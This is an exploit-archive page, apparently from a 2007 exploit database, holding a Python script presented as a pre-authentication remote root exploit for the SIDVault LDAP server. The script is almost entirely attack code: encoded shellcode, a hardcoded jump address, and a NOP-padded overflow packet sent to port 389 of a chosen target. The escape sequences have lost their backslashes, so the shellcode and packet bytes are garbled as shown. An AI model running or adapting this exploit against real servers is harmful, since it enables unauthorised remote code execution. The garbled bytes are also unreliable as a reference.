SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit
# Published : 2007-08-25
# Author : Joxean Koret
# Previous Title : Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP Overwrite Exploit
# Next Title : eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit

#!/usr/bin/python

"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
"""

import sys
import socket

sc  = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
sc += "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
sc += "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
sc += "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
sc += "x56x58x34x5ax38x42x44x4ax4fx4dx41x33x4bx4dx43x35"
sc += "x43x44x43x45x4cx56x44x30x4cx46x48x56x4ax45x49x49"
sc += "x49x38x41x4ex4dx4cx42x58x48x59x43x44x44x55x48x36"
sc += "x4ax36x41x31x4ex35x48x46x43x35x49x58x41x4ex4cx56"
sc += "x48x56x4ax55x42x45x41x55x48x35x49x48x41x4ex4dx4c"
sc += "x42x48x42x4bx48x46x41x4dx43x4ex4dx4cx42x48x44x35"
sc += "x44x55x48x45x43x54x49x38x41x4ex42x4bx48x36x4dx4c"
sc += "x42x38x43x39x4cx46x44x30x49x55x42x4bx4fx43x4dx4c"
sc += "x42x38x49x54x49x47x49x4fx42x4bx4bx50x44x35x4ax46"
sc += "x4fx32x4fx42x43x57x4ax46x4ax36x4fx32x44x56x49x36"
sc += "x50x46x49x38x43x4ex44x45x43x35x49x58x41x4ex4dx4c"
sc += "x42x48x5a"

#
# The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so)
#
addr = "x77xe7xffxff"

theLine = 'x90'*2076 + addr+ 'x90'*(2019-len(sc)) + sc

pkt  = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
pkt += theLine
pkt += 'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(pkt)
s.close()

# www.Syue.com [2007-08-25]